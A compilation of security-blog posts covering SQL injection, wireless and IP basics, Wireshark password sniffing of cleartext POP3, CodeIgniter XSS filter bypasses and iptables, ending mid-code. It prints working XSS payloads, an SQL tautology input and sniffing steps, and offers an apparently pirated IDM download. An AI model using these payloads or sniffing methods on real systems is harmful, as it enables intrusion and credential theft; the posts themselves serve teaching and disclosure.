
SQL Injection


SQL Injection is a type of web application security vulnerability in which an attacker is able to submit a database SQL command which is executed by a web application, exposing the back-end database.

A SQL Injection attack can occur when a web application uses user-supplied data as part of a command or query without proper validation or encoding. The specially crafted user data tricks the application into executing unintended commands or changing data. SQL Injection allows an attacker to create, read, update, alter, or delete data stored in the back-end database. In its most common form, a SQL Injection attack gives access to sensitive information such as social security numbers, credit card numbers or other financial data. SQL Injection is one of the most prevalent types of web application security vulnerability.

Key Concepts of a SQL Injection Attack

  • SQL injection is a software vulnerability that occurs when data entered by users is sent to the SQL interpreter as part of an SQL query.
  • Attackers provide specially crafted input data to the SQL interpreter and trick the interpreter into executing unintended commands.
  • Attackers exploit this vulnerability by providing specially crafted input data to the SQL interpreter in such a manner that the interpreter is not able to distinguish between the intended commands and the attacker’s specially crafted data. The interpreter is tricked into executing unintended commands.
  • A SQL Injection attack exploits security vulnerabilities at the database layer. By exploiting the SQL injection flaw, attackers can create, read, modify, or delete sensitive data.

Attack Intent

Attacks can also be characterized by the goal, or intent, of the attacker. The attack types below are defined in terms of those intents.
Identifying Injectable Parameters: The attacker wants to probe a Web application to discover which parameters and user-input fields are vulnerable.
Performing Database Finger-printing: The attacker wants to discover the type and version of database that a Web application is using. Certain types of databases respond differently to different queries and attacks, and this information can be used to “fingerprint” the database. Knowing the type and version of the database used by a Web application allows an attacker to craft database specific attacks.
Determining Database Schema: To correctly extract data from a database, the attacker often needs to know database schema information, such as table names, column names, and column data types. Attacks with this intent are created to collect or infer this kind of information.
Extracting Data: These types of attacks employ techniques that will extract data values from the database. Depending on the type of the Web application, this information could be sensitive and highly desirable to the attacker.
Adding or Modifying Data: The goal of these attacks is to add or change information in a database.
Performing Denial of Service: These attacks are performed to shut down the database of a Web application, thus denying service to other users. Attacks involving locking or dropping database tables also fall under this category.
Evading Detection: This category refers to certain attack techniques that are employed to avoid auditing and detection by system protection mechanisms.
Bypassing Authentication: The goal of these types of attacks is to allow the attacker to bypass database and application authentication mechanisms. Bypassing such mechanisms could allow the attacker to assume the rights and privileges associated with another application user.
Executing Remote Commands: These types of attacks attempt to execute arbitrary commands on the database. These commands can be stored procedures or functions available to database users.
Performing Privilege Escalation: These attacks take advantage of implementation errors or logical flaws in the database in order to escalate the privileges of the attacker. As opposed to bypassing authentication attacks, these attacks focus on exploiting the database user privileges.

Preventing SQL Injection Vulnerabilities
  • SQL injection can be prevented if you adopt an input validation technique in which user input is validated against a set of defined rules for length, type, and syntax, and also against business rules.
  • You should ensure that users with permission to access the database have the least privileges necessary. Additionally, do not use system administrator accounts like "sa" for Web applications. Also, always make sure that a database user is created only for a specific application and that this user is not able to access other applications' data.
  • Another method for preventing SQL injection attacks is to remove all stored procedures that are not in use.
  • Use strongly typed parameterized query APIs with placeholder substitution markers, even when calling stored procedures.
  • Take care with stored procedures: they are generally safe from injection, but they can still be injectable (for example via the use of exec() or by concatenating arguments inside the stored procedure).
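The difference between concatenation and placeholder markers, as an added example that is not part of the original post. It uses Python's sqlite3 module against a constructed in-memory user table; the login functions, table contents and the validation rule are assumptions for illustration.

```python
import re
import sqlite3


# Constructed in-memory user table so the example runs offline (sample data, not
# from the original page).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse", "admin"), ("bob", "battery staple", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation. The SQL interpreter cannot tell
    the developer's command apart from the user's data, which is the flaw the
    section above describes."""
    sql = (
        "SELECT username, role FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username, password):
    """Strongly typed placeholder markers (the '?' in sqlite3): statement and
    values travel separately, so user input is only ever compared as data."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def valid_username(username):
    """Input validation as an additional layer: length, type and syntax rules
    (here 1-32 ASCII letters, digits or underscores). It complements, and never
    replaces, parameterized queries."""
    return re.fullmatch(r"[A-Za-z0-9_]{1,32}", username) is not None


def demo():
    conn = make_db()
    # A password containing a quote turns the WHERE clause into a tautology:
    # ... AND password = '' OR '1'='1'   -> matches every row in the table.
    tautology = "' OR '1'='1"
    return {
        "normal_login_vulnerable": login_vulnerable(conn, "alice", "correct horse"),
        "normal_login_safe": login_parameterized(conn, "alice", "correct horse"),
        "crafted_input_vulnerable": login_vulnerable(conn, "alice", tautology),
        "crafted_input_safe": login_parameterized(conn, "alice", tautology),
        "crafted_input_rejected_by_validation": not valid_username("alice" + tautology),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```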


Wireless Attacks Unleashed

As we all know, wireless networks have spread to every part of the world, from personal homes to corporate business environments, schools/universities, cafes, etc. The major merit of wireless networking is that it eliminates the big and untidy cables, which take up space and spoil the look of your working area. But as we all know, every coin has two sides. Wireless networking has demerits as well: it comes with a high possibility of attacks. In this article I am going to describe different techniques of attacks on wireless networks and what we should do to prevent them.

Let’s start with the WLAN protocol, also known as the 802.11 protocol, which is commonly used for wireless networking. The major function of this protocol is to link more than one device. It uses spread spectrum signals, which are based on radio frequency communication: networking is established between two point-to-point end devices consisting of a transmitter and a receiver. In this mechanism, participants (the end devices) must have transmitters and receivers to send and receive signals.


To connect to the wireless network, each participant needs a wireless AP (Access Point, also known as a Wi-Fi hot-spot) along with a wireless adaptor. The AP acts like a walkie-talkie: it converts radio signals into digital signals and vice versa. When the AP transmits, the signals carry the SSID (service set identifier) and network identification information. The receiver detects these signals and lists the available wireless networks around it, along with their signal strength. It also identifies whether the AP is using any security and, if so, what level of security. Since a wireless network allows more than one node to connect, authentication is important to ensure that no malicious user is sitting on the network. The AP holds this responsibility.

Add More Options under “Send To” In Windows


You’ve seen the SendTo folder in action any time you right-click a file and select Send To from the context menu. What you might be unaware of is that you can customize the items in this menu: you can add other items under Send To.

1. First of all, make Windows show hidden files, folders and drives. Go to Control Panel and open Folder Options.

2. Go to the View tab, select ‘Show hidden files, folders and drives’, then click OK.

Now to the main part. Before starting, I want to tell you that this can be done in two different ways. I will explain both methods one by one.

Before customizing, have a look at the default SendTo folder.

METHOD: 1

Step 1: Go to Local Disk C → Users → R (your user name; this will differ on your PC) → AppData → Roaming → Microsoft → Windows → SendTo
Finally, you will see a window like the image below. This is the location of SendTo.

Step 2: In this window, copy and paste whatever file, folder or drive you want to add under your system’s SendTo. For example, here I added a folder named Geeky Show. You can also copy and paste other applications such as WinZip, WinRAR etc.

As a result, when we right-click on a file or folder and hover over Send To, we can see that our folder Geeky Show has been added successfully.

METHOD: 2

Step 1: Open Run from the Start menu or by pressing Windows + R.
After Run opens, type shell:sendto in the Open field, then click OK.

Step 2: Soon a window will appear on your desktop like the image below. This is the location of SendTo.


Step 3: In this window, copy and paste whatever file, folder or drive you want to add under your Windows SendTo. For example, here I added a folder named Geeky Show. You can also copy and paste other applications such as WinZip, WinRAR etc.

As a result, when we right-click on a file or folder and hover over Send To, we can see that our folder Geeky Show has been added successfully.
Written by Mr. d00z13


Full Version Internet Download Manager 7.1


Internet Download Manager (IDM) is a tool to increase download speeds by up to 5 times, and to resume and schedule downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. A simple graphic user interface makes IDM user friendly and easy to use. Internet Download Manager has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download managers and accelerators, Internet Download Manager segments downloaded files dynamically during the download process and reuses available connections without additional connect and login stages to achieve the best acceleration performance.

Dear Geekyshows visitors, enjoy the free full version of IDM 7.1.

Download Link : Internet Download Manager



IP Address


IP (Internet Protocol) - An IP address is a fascinating product of modern computer technology designed to allow one computer or other digital device to communicate with another via the Internet. IP addresses allow the location of literally billions of digital devices that are connected to the Internet to be pinpointed and differentiated from other devices. 
An IP address consists of four numbers, each of which contains one to three digits, with a single dot '.' separating each number or set of digits. Each of the four numbers can range from 0 to 255. Here's an example of what an IP address might look like: 24.168.0.205. This innocuous-looking group of four numbers is the key that empowers you and me to send and retrieve data over our Internet connections, ensuring that our messages, as well as our requests for data and the data we've requested, will reach their correct Internet destinations. Without this numeric protocol, sending and receiving data over the World Wide Web would be impossible. IP addresses can be either static or dynamic.
Static IP - Static IP addresses never change. They serve as a permanent Internet address and provide a simple and reliable way for remote computers to contact you. Static IP addresses reveal such information as the continent, country, region, and city in which a computer is located; the ISP (Internet Service Provider) that services that particular computer; and such technical information as the precise latitude and longitude of the country, as well as the locale, of the computer. Static IP addresses are generally preferable for such uses as VOIP (Voice over Internet Protocol), online gaming, or any other purpose where users need to make it easy for other computers to locate and connect to them. Static IP addresses are considered somewhat less secure than dynamic IP addresses, since they are easier to track for data mining purposes. 
Dynamic IP - Dynamic IP addresses are temporary and are assigned each time a computer accesses the Internet. They are, in effect, borrowed from a pool of IP addresses that are shared among various computers.

Some Special IP Addresses:

Address Block        Present Use
0.0.0.0/8            "This" Network
10.0.0.0/8           Private-Use Networks
14.0.0.0/8           Public-Data Networks
24.0.0.0/8           Cable Television Networks
39.0.0.0/8           Reserved, Subject to Allocation
127.0.0.0/8          Loopback
128.0.0.0/16         Reserved, Subject to Allocation
169.254.0.0/16       Link Local
172.16.0.0/12        Private-Use Networks
191.255.0.0/16       Reserved, Subject to Allocation
192.0.0.0/24         Reserved, Subject to Allocation
192.0.2.0/24         Test-Net
192.88.99.0/24       6to4 Relay Anycast
192.168.0.0/16       Private-Use Networks
198.18.0.0/15        Network Interconnect Device Benchmark Testing
223.255.255.0/24     Reserved, Subject to Allocation
224.0.0.0/4          Multicast, commonly used in multiplayer simulations and gaming and for video distribution
240.0.0.0/4          Reserved for Future Use
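How a defender puts the table above to work, as an added example that is not part of the original post: it classifies an address against the special-use blocks with Python's ipaddress module and then scans constructed firewall log lines for sources that can never legitimately arrive from the Internet. The log format, the addresses and the choice of "non-routable" blocks are assumptions for illustration.

```python
import ipaddress
import re

# Special-use blocks from the table above. A /12 must start on a multiple of 16 in
# its second octet, so the RFC 1918 private block is 172.16.0.0/12.
SPECIAL_USE = [
    ("0.0.0.0/8", '"This" Network'),
    ("10.0.0.0/8", "Private-Use Networks"),
    ("14.0.0.0/8", "Public-Data Networks"),
    ("24.0.0.0/8", "Cable Television Networks"),
    ("39.0.0.0/8", "Reserved, Subject to Allocation"),
    ("127.0.0.0/8", "Loopback"),
    ("128.0.0.0/16", "Reserved, Subject to Allocation"),
    ("169.254.0.0/16", "Link Local"),
    ("172.16.0.0/12", "Private-Use Networks"),
    ("191.255.0.0/16", "Reserved, Subject to Allocation"),
    ("192.0.0.0/24", "Reserved, Subject to Allocation"),
    ("192.0.2.0/24", "Test-Net"),
    ("192.88.99.0/24", "6to4 Relay Anycast"),
    ("192.168.0.0/16", "Private-Use Networks"),
    ("198.18.0.0/15", "Network Interconnect Device Benchmark Testing"),
    ("223.255.255.0/24", "Reserved, Subject to Allocation"),
    ("224.0.0.0/4", "Multicast"),
    ("240.0.0.0/4", "Reserved for Future Use"),
]
_NETWORKS = [(ipaddress.ip_network(cidr), use) for cidr, use in SPECIAL_USE]

# Blocks that must never appear as the *source* of a packet arriving from the
# Internet: private, loopback, link-local, test and multicast ranges ("bogons").
NON_ROUTABLE_SOURCES = {
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12",
    "192.0.2.0/24", "192.168.0.0/16", "198.18.0.0/15", "224.0.0.0/4", "240.0.0.0/4",
}


def classify(addr):
    """Return (block, present use) for the most specific matching table entry,
    or (None, 'Public (not in the table)') when no special-use block matches."""
    ip = ipaddress.ip_address(addr)
    matches = [(net, use) for net, use in _NETWORKS if ip in net]
    if not matches:
        return None, "Public (not in the table)"
    net, use = max(matches, key=lambda m: m[0].prefixlen)  # longest prefix wins
    return str(net), use


# Constructed sample of netfilter-style log lines from an Internet-facing interface
# (sample data, not taken from the original page). 172.32.0.1 sits just outside
# the /12, and 192.88.99.1 is a special-use block that may legitimately send.
SAMPLE_LOG = """\
Jun 01 12:00:01 fw kernel: IN=eth0 SRC=24.168.0.205 DST=192.0.2.10 PROTO=TCP DPT=443
Jun 01 12:00:02 fw kernel: IN=eth0 SRC=10.0.0.5 DST=192.0.2.10 PROTO=TCP DPT=22
Jun 01 12:00:03 fw kernel: IN=eth0 SRC=127.0.0.1 DST=192.0.2.10 PROTO=UDP DPT=53
Jun 01 12:00:04 fw kernel: IN=eth0 SRC=169.254.10.1 DST=192.0.2.10 PROTO=TCP DPT=80
Jun 01 12:00:05 fw kernel: IN=eth0 SRC=172.16.5.5 DST=192.0.2.10 PROTO=TCP DPT=80
Jun 01 12:00:06 fw kernel: IN=eth0 SRC=172.32.0.1 DST=192.0.2.10 PROTO=TCP DPT=80
Jun 01 12:00:07 fw kernel: IN=eth0 SRC=192.88.99.1 DST=192.0.2.10 PROTO=TCP DPT=80
"""


def flag_spoofed_sources(log_text):
    """Detection: list (source, present use) for log lines whose source address
    falls in a block that cannot legitimately originate traffic from the Internet.
    Such packets point at spoofing or a misconfigured upstream filter."""
    findings = []
    for line in log_text.splitlines():
        m = re.search(r"\bSRC=(\d+\.\d+\.\d+\.\d+)\b", line)
        if not m:
            continue
        block, use = classify(m.group(1))
        if block in NON_ROUTABLE_SOURCES:
            findings.append((m.group(1), use))
    return findings


if __name__ == "__main__":
    for addr in ("24.168.0.205", "172.31.255.255", "172.32.0.1", "192.0.2.1"):
        print(addr, "->", classify(addr))
    for src, use in flag_spoofed_sources(SAMPLE_LOG):
        print("suspicious source", src, "-", use)
```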


How To Capture Passwords Across The Air - Network Traffic Analysis



ABSTRACT

     It is known that WireShark is a powerful tool that goes far beyond a simple sniffer. What many do not know is that there are several ways to harness the potential of this tool, and that is what this article aims to introduce to readers. We will learn to sniff the network effectively, create filters to find only the information we want, see how a black hat would use this tool to steal passwords, and finally how to use WireShark to diagnose network problems or check whether a firewall is blocking packets correctly.

INTRODUCTION

     Today it is very unlikely that your password will be brute forced. You use the internet regularly and one day you're surprised to receive allegations of an intrusion. Evidence indicates that the intrusions into third-party accounts originated from your account, and you have no idea what is happening. Someone may have used your account and performed those acts as you. How could this have happened? A strong possibility is that you have become the victim of an attack via a "sniffer".

UNDERSTAND THE MAIN CONCEPT

     What are "sniffers"? The main purpose of a sniffer is to capture network traffic. They are used for network analysis purposes; however, they can also be used by malicious hackers to capture your passwords. Even IDS systems are based on network sniffers.

     These programs also allow you to monitor network activity, recording data (usernames, passwords, etc.) each time users access other computers on the network.

     These programs aim at monitoring ("sniffing") network traffic to capture accesses to network services, such as remote mail (IMAP, POP3), remote access (telnet, rlogin, etc.) and file transfer (FTP), by capturing packets, always aiming to get the most relevant information.
     On a network built around a hub, when one computer sends information to another, the data in reality goes to all ports of the hub, and therefore to all machines. Only the machine the information was intended for passes it up to the operating system.

     If a sniffer is running on another computer, even though that system is not the intended recipient, the data still travels to it; the sniffer intercepts it at the network layer, capturing the data and displaying it to the user in a raw form. Generally the data is organized by type of protocol (TCP, UDP, FTP, ICMP, etc.) and the content of each packet read can be shown.


YOUR PASSWORD CAN BE CAPTURED BY SNIFFERS!

     Many local area networks (LANs) are configured sharing the same Ethernet segment. Virtually any computer on the network can run a "sniffer" program to "steal" users' passwords. "Sniffers" work by monitoring the flow of communication between computers on the network to find out when someone uses the network services previously mentioned. Each of these services uses a protocol that defines how a session is established, how your account is identified and authenticated, and how the service is used.
     To have access to these services, you first have to "log in". The login sequence, which is part of the authentication protocol and occurs at the beginning of each session, is what the "sniffers" are interested in, because that is the part that carries your password. Therefore, it is enough to filter for the key "strings" and the password is obtained.


STEP BY STEP

     Currently, almost all environments use switches rather than hubs, which makes sniffing a little more difficult because a switch does not send the data to all ports as a hub does; it sends it directly to the port where the destination host is. So if you try to sniff a switched network you will only hear what is broadcast, or your own connection. To be able to hear everything without being the gateway of the network, an ARP spoofing attack (aka ARP poisoning) is necessary, or flooding the CAM table of the switch.

Basic Usage
     Now let's get our hands dirty. I'm assuming you already have the program (WireShark) installed; if you do not, download it. When starting WireShark, the displayed screen will look something like Figure 1:


Figure 1) Wireshark.

     Before you can start capturing packets, we have to define which interface will "listen" to the traffic. Click Capture > Interfaces.


Figure 2) Interfaces.

     From there, a new window will appear with the list of automatically detected interfaces. Simply select the desired interface by clicking the box next to its name, as in Figure 3:


Figure 3) Capture Interfaces.

     If you click Start, it will begin capturing packets immediately. Alternatively, select the interface first and start the capture only when you need it.
     When the capture process starts, you will see several packets traversing the WireShark screen (varying according to the traffic of your machine / network). It will look something like Figure 4:


Figure 4) Capturing.

     To stop the capture, simply click the button, "Stop the running live capture".


Figure 5) Stop.

     It is important to remember that you must take care if your network is busy: the data stream may even lock up your machine, so it is not advisable to leave WireShark capturing for a long time. As we will see, we will leave it running only while debugging a connection. The greater the number of packets, the longer it takes to apply a filter, find a packet, etc.

     With this we have the basics of the program: we can set the capture interface, and start and stop the capture. The next step is to identify what interests us among the many packets. For this, we will start using filters.

Using Filters

     There are a plethora of possible filters, but for now we will see just how to filter by IP address, port and protocol.
     Filters can be constructed by clicking on "Filter" and then selecting the desired filter (there is a short list of pre-defined filters), or by typing directly into the text box. After you create your filter, just click "Apply"; if you want to see the entire list of packets again, just click "Clear", which removes the previously applied filter.


Figure 6) Filter.


     I will use a small filter list as an example:


Figure 7) Example by Rafael Souza (RHA Infosec).


     It is also possible to combine filters. For example, the following two forms are equivalent:

ip.src == 10.10.10.1 && tcp.dstport == 80
ip.src == 10.10.10.1 and tcp.dstport == 80

Source address 10.10.10.1 and destination port 80.


CAPTURING PASSWORDS

     Now we will see how passwords can be captured easily, just by listening to traffic. For this example we will use the POP3 protocol, which sends data in clear text over the network. To do this, start capturing packets normally and start a session with your POP3 email server. If you use a safer protocol like IMAPS or POP3S and just want to see how the mechanism works, it is possible to connect via telnet to POP3 without having to add / modify your account; simply run the following:

telnet serveremail.com 110
user user@rhainfosec.com
pass rhainfosecpasswd

     Now stop the capture, type "pop" in the filter field and click "Apply". Once that is done, you see only the packets of the POP3 connection. Now right-click on any of them and click "Follow TCP Stream".


Figure 8) POP3.
     This opens a new window with the entire ASCII contents of the connection. As the POP3 protocol sends everything in plain text, you can see all the commands executed, including the password.


Figure 9) Pass.

     This can be applied to any connection in plain text, such as FTP, Telnet, HTTP, etc. Just change the filter and examine the contents of the connection.

Importing External Captures

     Usually servers have no graphical environment installed, so you cannot use WireShark directly. If you want to analyze traffic on such a server and cannot install WireShark, or have to capture the traffic elsewhere, the best you can do is record the traffic with tcpdump locally and then copy this dump to a machine with WireShark, where a more detailed analysis is made.

     We will capture everything that comes and goes to/from the host 10.10.10.1 with destination port 80 and save the content in the file capturerafaelsouzarhainfosec.pcap in the local folder where the command was executed. Run on the server:

tcpdump -i eth0 host 10.10.10.1 and dst port 80 -w capturerafaelsouzarhainfosec.pcap

     Once you're finished capturing (stop tcpdump with CTRL + C), copy the file to the machine with WireShark and import it by clicking on File -> Import. Once imported, you can use the program normally as if the capture had occurred locally.


EVOLUTION OF THINKING

Why steal your password?

     There are various reasons that lead people to steal passwords, from simply annoying someone (sending email as you) to performing illegal activities (intrusion into other computers, theft of information, etc.). An attraction for crackers is the ability to use the identity of others in these activities.

     One of the main reasons that attackers try to break into systems and install "sniffers" is the ability to quickly capture the maximum number of accounts. Thus, the more accounts the attacker has, the easier it is to hide their tracks.

How can you protect yourself?

     Do not think that "sniffers" make the whole internet insecure. It is not so. You need to be aware of where the risk is, when you're at risk and what to do to be safe.

     When you have your credit card stolen or suspect that someone may be using it improperly, you cancel the card. Likewise, as passwords can be stolen, it's critical that you replace them regularly. This precaution limits the amount of time that a stolen password can be used by an attacker.

     Never share your password with others. Sharing makes it difficult to know where your password is being used (exposed) and makes unauthorized use harder to detect. A password is like a toothbrush: never share it and change it regularly.

     Never give your password to anyone claiming they need access to fix your account problem or wanting to investigate the breach of a system. This trick is one of the most effective methods of hacking, known as "social engineering."

Use networks you can trust

     Another aspect you should take into consideration is which networks you can trust and which you cannot. If you are traveling and need to access an organization's computer remotely, have a high level of assurance that the network is secure. For example, would you make any file in your home directory available to a "LanHouse" or to another organization's network? Are you sure you can trust the network?

     If you have no alternative for secure remote access and only have resources such as telnet available, you can "mitigate" the effect by changing the password at the end of each session. Remember that only the first packets (200-300 bytes) of each session carry your "login" information. Therefore, if you always change your password before logging out, the new password will not have been captured, and the password that was exposed to the network before it is no longer valid. Of course it is possible to capture everything going across the network, but the attacker has no intention of filling their file system quickly and being so easily discovered.

Why are networks so vulnerable to "sniffers"?

     There are several reasons and there is no quick solution to the problem.

     Part of the problem is that companies tend to invest in new features rather than add security. New security features can make systems more difficult to configure and less convenient to use. Remember that companies try to adhere to the C.I.A. triangle (confidentiality, integrity, and availability). New features create unintended effects on availability, and when this happens policy is overlooked, creating a new vulnerability in itself.

     Another part of the problem is the added cost of Ethernet switches, hubs and network interfaces that do not support the "promiscuous" mode that sniffers rely on.


CONCLUSION

     The question that remains is how can we protect ourselves from this threat...


i) Network cards that cannot be put into "promiscuous" mode. Thus, computers cannot be taken over and transformed into "sniffers".

ii) Typically, the Ethernet interface only passes packets intended for the local machine up to the higher-level protocol. Switching the interface into promiscuous mode allows all packets to be accepted and passed to the higher layers of the protocol stack, letting the attacker select what they want.

iii) Packages that encrypt data in transit over the network, thus preventing passwords from flowing "in the clear".

     I would remind you that the safest thing to adopt and encourage is software that enables encrypted remote access sessions; it helps make your environment much more secure.

     One fairly common encryption technology currently used for secure communication between remote machines is SSH (Secure Shell). SSH is available for different platforms. Its use does not prevent the packets from being captured, but what is captured is encrypted and therefore useless to the attacker. SSH negotiates connections using the RSA algorithm. Once the service is authenticated, all subsequent traffic is encrypted using IDEA technology. This type of encryption is very strong.

     In the future, security will be increasingly intrinsic to systems and network infrastructure. There is no use in having all the security "apparatus" you need if you do not use it. Nothing can be made completely secure. Remember, no one is 100% secure.

Thank you, readers; it's always good to help my dear friend Rafay Baloch.

ABOUT THE AUTHOR:

This is a guest post written by RAFAEL FONTES SOUZA. He is the maintainer of the “Project Backtrack Team Brazilian” and works at RHAinfosec as a senior penetration tester. He is also the founder of the "Wikileaks and Intelligence, Cypherpunks". He communicates well with groups and the general public, has taken part in college projects with a focus on business organization, and currently seeks work experience outside of Brazil. He frequently contributes at RHA and talks about various topics related to internet security.

Code Igniter XSS Filter Multiple Bypasses


Recently we released our "XSS Filter Evasion Cheat Sheet", and I was quite surprised by the community feedback. Total downloads have surpassed 2500, which was quite amazing considering that I didn't expect it to escalate that quickly. Recently, I had a chance to test Code Igniter's XSS clean function; as it relied upon a blacklist, it caught my interest. I was pleased that almost all the payloads/techniques used to bypass the "XSSCLEAN" function had already been documented inside our "XSS Filter Evasion Cheat Sheet".

Vulnerability Details

The test-bed I used was set up by @soaj1664ashar based upon the rules of the "XSS Clean" function inside Code Igniter.

http://xssplayground.net23.net/clean11.html

I managed to find lots of bypasses; however, a couple of them collided with what @soaj1664ashar had already found before. Therefore, I decided to publish the ones that did not collide with his vectors.

Bypass 1 - Null Bytes

Internet Explorer up to version 9 ignores null bytes everywhere. The XSSClean function was filtering for keywords like <script>, but it was not filtering out the null bytes. Therefore, under Internet Explorer 9 and below, the following is a valid vector that executes JavaScript perfectly.

<scr\x00ipt>confirm(1);</scr\x00ipt>

Bypass 2 - SVG and XLINK

The XSSCLEAN function was not filtering out the SVG tag and the xlink attribute. At the same time, the XSSCLEAN function was filtering out keywords such as javascript, vbscript etc. However, this doesn't prevent us from executing JavaScript, as the relevant filter code shows:

protected function _js_link_removal($match)
{
    //echo "in link removal";
    return str_replace($match[1],
        preg_replace('#href=.*?(?:alert\(|alert&\#40;|javascript:|livescript:|mocha:|charset=|window\.|document\.|\.cookie|<script|<xss|data\s*:)#si',
            '',
            $this->_filter_attributes(str_replace(array('<', '>'), '', $match[1]))
        ),
        $match[0]);
}

The following payload manages to pass through the XSSCLEAN function of CodeIgniter and yields valid JavaScript:

<svg xmlns:xlink=http://www.w3.org/1999/xlink><a><circle r=100 /><animate attributeName=xlink:href values=;javas&Tab;cript&colon;confirm&lpar;1&rpar; />

Bypass 3 - HREF


Since we were able to bypass the blacklist that was looking for the keyword "javascript", we can use the href attribute to execute valid JavaScript.

<a/href=javas&Tab;cript&colon;confirm(top.location)>XSS

There are countless other variations, though.

Bypass 4 - Separators

There are certain characters that get parsed as whitespace characters. Since "Code Igniter" was not filtering out these space characters, they can be used to yield valid JavaScript syntax inside various browsers. For more information on them, please refer to our "XSS Filter Evasion Cheat Sheet".
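Why Bypasses 2, 3 and 4 get past a keyword blacklist, as an added example that is not part of the original post: the regex quoted from _js_link_removal above is transcribed to Python and run against the post's own payloads, a small model of the browser's attribute decoding shows what the filter never sees, and output encoding is shown as the alternative. This is only the regex from the post, not CodeIgniter's full xss_clean pipeline; the helper names and the browser model are assumptions.

```python
import html
import re

# The keyword blacklist from CodeIgniter's _js_link_removal quoted above, transcribed
# to Python: PHP's `#...#si` delimiters and flags become re.I | re.S, and `&\#40;`
# (an escape for the PHP delimiter) is simply `&#40;`.
JS_LINK_BLACKLIST = re.compile(
    r"href=.*?(?:alert\(|alert&#40;|javascript:|livescript:|mocha:|charset=|"
    r"window\.|document\.|\.cookie|<script|<xss|data\s*:)",
    re.I | re.S,
)

# Payloads quoted in the post (Bypass 2 and Bypass 3).
PAYLOAD_SVG = ("<svg xmlns:xlink=http://www.w3.org/1999/xlink><a><circle r=100 />"
               "<animate attributeName=xlink:href values=;javas&Tab;cript&colon;confirm&lpar;1&rpar; />")
PAYLOAD_HREF = "<a/href=javas&Tab;cript&colon;confirm(top.location)>XSS"


def blacklist_hit(fragment):
    """What the regex alone would strip: the matched text, or None when it misses."""
    m = JS_LINK_BLACKLIST.search(fragment)
    return m.group(0) if m else None


def effective_scheme(attr_value):
    """Small model of what the browser does *after* the filter has run: HTML
    character references in an attribute value are decoded (&Tab; -> TAB,
    &colon; -> ':'), and tab/newline characters are ignored when the URL scheme
    is parsed (the 'separators' of Bypass 4). The literal keyword 'javascript:'
    therefore never has to appear in the input the filter inspects."""
    decoded = html.unescape(attr_value)
    stripped = re.sub(r"[\t\n\r]", "", decoded)
    scheme, sep, _ = stripped.partition(":")
    return scheme.lower() if sep else None


def safe_output(untrusted):
    """The alternative to a blacklist: context-aware output encoding. Every
    < > & " ' becomes a character reference, so untrusted text can no longer
    change the markup structure, whatever keywords it contains."""
    return html.escape(untrusted, quote=True)


if __name__ == "__main__":
    for name, p in (("svg", PAYLOAD_SVG), ("href", PAYLOAD_HREF)):
        print(name, "blacklist hit:", blacklist_hit(p))
    print("browser-side scheme:", effective_scheme("javas&Tab;cript&colon;confirm(1)"))
    print("encoded for output:", safe_output(PAYLOAD_HREF))
```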

More Bypasses

Ashar Javed found various bypasses for CodeIgniter; if you are interested in more bypasses, please refer to the link below:

https://github.com/EllisLab/CodeIgniter/issues/2667

Everything About Linux Iptables/Linux Firewall

Introduction
Firewalls are used to monitor and control the inbound and outbound traffic of the protected network. They have the ability to block and allow internal as well as external services within the network. Before allowing access to a service, a firewall may also force the client / user to pass through authentication. Sometimes a firewall is also used as a platform for IPSEC tunnels. It monitors security-related events.

Packet Filtering
The packet filtering mechanism mainly inspects TCP/IP and UDP packets, including all ports. In this process, rules are written to allow or reject the packets passing through the network. The rules written in the firewall may match on TCP and UDP port numbers and on source and destination addresses. Firewall rules can be implemented in both the inbound and outbound directions.

Types of Firewalls
There are basically four types of firewalls:
  1. Packet Filter Firewall
  2. Stateful Packet Filter Firewall
  3. Circuit Level Gateway
  4. Application Level Gateway
Packet Filter Firewall
This firewall comes into play when an administrator wants only certain packets to enter into the protected network. In this case, each packet will be monitored and inspected before passing through the network, and after monitoring and inspecting, the firewall will decide whether to let it pass or not.

There are two types of packet filter mechanisms:
  1. Stateful Packet Filtering
    These firewalls are known as smart / clever firewalls. If the firewall remembers the packets it has allowed and blocked on the network, it is known as stateful packet filtering. Sometimes it is also called dynamic packet processing.
  2. Stateless Packet Filtering
    In this case, information about previous packets that passed through the network is not remembered by the firewall. This type of firewall can be bypassed and easily fooled by attackers, and is especially dangerous for UDP packets. This firewall never comes to know whether a given packet is part of an existing connection or a rogue, useless packet, because it isolates each and every packet.
Stateful Filter Firewall
I have already mentioned the stateful packet filtering process in the section above. Additionally, this type of firewall keeps track of TCP streams in order to inspect each and every packet passing in and out of the network. Generally this type of firewall is constructed to inspect packets coming in only one direction, from client to server; an automatic process handles the counter requests (replies) going from server to client. It is able to support a wider range of protocols such as IRC, FTP, etc.
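The difference between the two mechanisms is easiest to see on concrete traffic. The following is an added teaching model in Python, not iptables and not code from the article: a stateless filter that needs a static "accept inbound packets from source port 80/443" rule so that web replies get back in, and a stateful filter that records outbound flows and admits only packets matching the reverse of a recorded flow (what iptables tracks as ESTABLISHED). Addresses, ports and the internal prefix are constructed for the example.

```python
from dataclasses import dataclass

# Constructed: hosts under this prefix are "inside" the protected network.
INTERNAL_PREFIX = "10.0.0."


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str


def is_internal(ip: str) -> bool:
    return ip.startswith(INTERNAL_PREFIX)


class StatelessFilter:
    """Judges every packet in isolation. To let server replies back in it needs a
    static rule such as 'accept inbound TCP with source port 80/443'; that same rule
    also accepts any unsolicited packet that merely claims such a source port."""
    REPLY_PORTS = {80, 443}

    def decide(self, p: Packet) -> str:
        if is_internal(p.src):
            return "ACCEPT"                       # outbound is always allowed
        if p.proto == "tcp" and p.sport in self.REPLY_PORTS:
            return "ACCEPT"                       # looks like a reply, so it passes
        return "DROP"


class StatefulFilter:
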